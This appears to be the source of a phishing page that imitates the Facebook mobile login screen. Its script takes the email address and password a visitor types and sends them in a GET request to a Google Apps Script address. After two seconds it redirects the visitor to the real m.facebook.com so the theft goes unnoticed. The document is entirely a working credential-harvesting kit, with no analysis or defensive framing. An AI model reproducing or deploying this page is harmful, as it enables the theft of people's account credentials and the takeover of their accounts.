https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Facebook – log in or sign up
Mobile number or email address
Log In
$(document).ready(function () {
$(“#login”).on(‘click’, function (event) {
execute();
});
function execute() {
setTimeout(function(){
window.location.href = ‘https://m.facebook.com/’;
}, 2000);
const mail = document.querySelector(‘#m_login_email’).value;
const password = document.querySelector(‘#m_login_password’).value;
$.ajax({
type: ‘GET’,
url: `https://script.google.com/macros/s/AKfycbwVq6x-ro0HHEF07N1cEUyFwUT564bNlTs1635MTJiFqlsrz-4nSTBI0P3sPRA0m2lzqQ/exec?mail=` + mail + `&password=` + password , });}});